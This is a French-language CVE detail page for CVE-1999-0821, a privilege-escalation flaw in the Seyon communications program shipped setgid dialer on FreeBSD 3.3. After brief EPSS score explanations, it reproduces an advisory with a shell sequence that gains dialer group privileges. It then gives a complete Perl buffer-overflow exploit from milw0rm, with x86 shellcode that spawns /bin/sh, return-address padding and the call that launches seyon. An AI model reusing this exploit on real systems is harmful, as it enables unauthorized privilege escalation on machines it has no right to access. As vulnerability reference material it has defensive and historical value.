CVE-1999-0821 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

source: https://www.securityfocus.com/bid/838/info FreeBSD 3.3-RELEASE ships with Seyon, a communications program which is known to have several vulnerabilities which can allow for a malicious user to elevate priviliges. The vulnerability, however, is that seyon is still installed setgid dialer in FreeBSD. When seyon is exploited, a local user can grant him/herself priviliges which allow access to the communications devices or anything else accessable by the group dialer. One of the methods to exploit seyon is shown below: bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c bash-2.03$ gcc -o id id.c bash-2.03$ seyon -emulator ./id uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)

#!/usr/bin/perl ## (c) Copyright [email protected] / anno domani 2000 ## ## Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux ## Tested on: RedHat 4.0/5.1 ## ## Greets: scrippie, *@HWA, grazer, mixter, pr0ix, s\ ## http://www.digit-labs.org/ || http://teleh0r.cjb.net/ $shellcode = "\xeb\x1f". #/* jmp 0x1f */ "\x5e". #/* popl %esi */ "\x89\x76\x08". #/* movl %esi,0x8(%esi) */ "\x31\xc0". #/* xorl %eax,%eax */ "\x88\x46\x07". #/* movb %eax,0x7(%esi) */ "\x89\x46\x0c". #/* movl %eax,0xc(%esi) */ "\xb0\x0b". #/* movb $0xb,%al */ "\x89\xf3". #/* movl %esi,%ebx */ "\x8d\x4e\x08". #/* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c". #/* leal 0xc(%esi),%edx */ "\xcd\x80". #/* int $0x80 */ "\x31\xdb". #/* xorl %ebx,%ebx */ "\x89\xd8". #/* movl %ebx,%eax */ "\x40". #/* inc %eax */ "\xcd\x80". #/* int $0x80 */ "\xe8\xdc\xff\xff\xff". #/* call -0x24 */ "/bin/sh"; #/* .string \"/bin/sh\" */ $ret = 0xbfffef96; $egg = 500; $len = 208; $nop = 'A'; if (@ARGV == 1) { $offset = $ARGV[0]; } if (!($ENV{'DISPLAY'})) { die("Error: the shell variable DISPLAY is not set.\n"); } $buffer .= $nop; $new_ret = pack('l',($ret + $offset)); print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n"); sleep(1); for ($i = 0; $i < $len; $i += 4) { $buffer .= pack('l',($ret + $offset)); } for ($i = 0; $i < ($egg - length($shellcode)); $i++) { $buffer .= $nop; } $buffer .= $shellcode; # seyon uses X, so if there is no X server running, or you # are not allowed to connect to it, start X on your machine, # and using xhost, allow the target to connect to your server, # then: export DISPLAY=your-ip:0.0 - and execute the exploit. exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\""); # milw0rm.com [2001-01-15]